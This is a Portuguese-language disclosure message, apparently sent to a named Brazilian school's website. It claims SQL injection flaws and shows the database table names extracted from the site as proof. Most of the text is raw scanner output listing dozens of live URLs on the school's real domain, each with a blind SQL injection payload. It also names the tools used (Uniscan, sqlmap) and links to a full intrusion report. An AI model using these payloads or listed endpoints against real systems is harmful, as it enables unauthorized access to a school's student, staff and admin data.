O seu site possui uma vulnerabilidade sql injection uma vulnerabilidade grave e que

pode dar acesso total ao seu site.

Abaixo mostro as tabelas do seu banco de dados como prova da potencia da

vulnerabilidade

+-------------------+
| session |
| user |
| admin |
| agenda |
| agendas |
| albums |
| albums_photos |
| aluno |
| cursos |
| diariodeclasse |
| downloads |
| empregos |
| evento |
| info_uteis |
| itenspergunta |
| jornal |
| noticia |
| noticias |
| perguntas |
| pesquisa |
| postagem_material |
| professor |
| turma |
| useradmin |
+-------------------+

As falhas esto presentes nos links :

| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=392'+AND+'1'='1
| [+] Keyword: oportunidade
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=395'+AND+'1'='1
| [+] Keyword: anatomia
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=393'+AND+'1'='1
| [+] Keyword: vindas
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=13'+AND+'1'='1
| [+] Keyword: ENSINO
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=3'+AND+'1'='1
| [+] Keyword: objetivo
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=394'+AND+'1'='1
| [+] Keyword: Aprenda
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=47'+AND+'1'='1
| [+] Keyword: valoriza
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=2'+AND+'1'='1
| [+] Keyword: capacitar
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=4'+AND+'1'='1
| [+] Keyword: realiza
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=5'+AND+'1'='1
| [+] Keyword: retardamento
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=7'+AND+'1'='1
| [+] Keyword: NUTRIO
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=6'+AND+'1'='1
| [+] Keyword: objetivo
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=8'+AND+'1'='1
| [+] Keyword: SEGURANA
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=9'+AND+'1'='1
| [+] Keyword: deseja
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=11'+AND+'1'='1
| [+] Keyword: REFRIGERAO
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=17'+AND+'1'='1
| [+] Keyword: colabora
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=12'+AND+'1'='1
| [+] Keyword: oferecido
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=390'+AND+'1'='1
| [+] Keyword: Informtica
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=4'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=389'+AND+'1'='1
| [+] Keyword: TCNICO
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=387'+AND+'1'='1
| [+] Keyword: Informtica
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=386'+AND+'1'='1
| [+] Keyword: Formatura
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=385'+AND+'1'='1
| [+] Keyword: Eletrotcnica
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=377'+AND+'1'='1
| [+] Keyword: Administrao
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=1'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=3'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=2'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=7'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=8'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=9'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=5'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=1'+AND+'1'='1
| [+] Keyword: AUTOMAO
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=10'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=12'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=379'+AND+'1'='1
| [+] Keyword: Inaugural
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/noticia.php?
id=380'+AND+'1'='1
| [+] Keyword: Administrao
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=11'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/galeriafotos.php?
id=6'+AND+'1'='1
| [+] Keyword: completa
| [+] Vul [Blind SQL-i]: http://www.colegiocest.com.br/detal_curso.php?
id=10'+AND+'1'='1
| [+] Keyword: objetivo
As ferramentas usadas no pentest foram: Uniscan e sqlmap

A baixo o link do pentest completo

link do scaneamento do site : https://www.scribd.com/document/359077087/Scan

link da invaso do site obs:Por questo de privacidade no ultrapassei das tabelas

por questo de privacidade do site:

https://www.scribd.com/document/359078015/SQL-Injection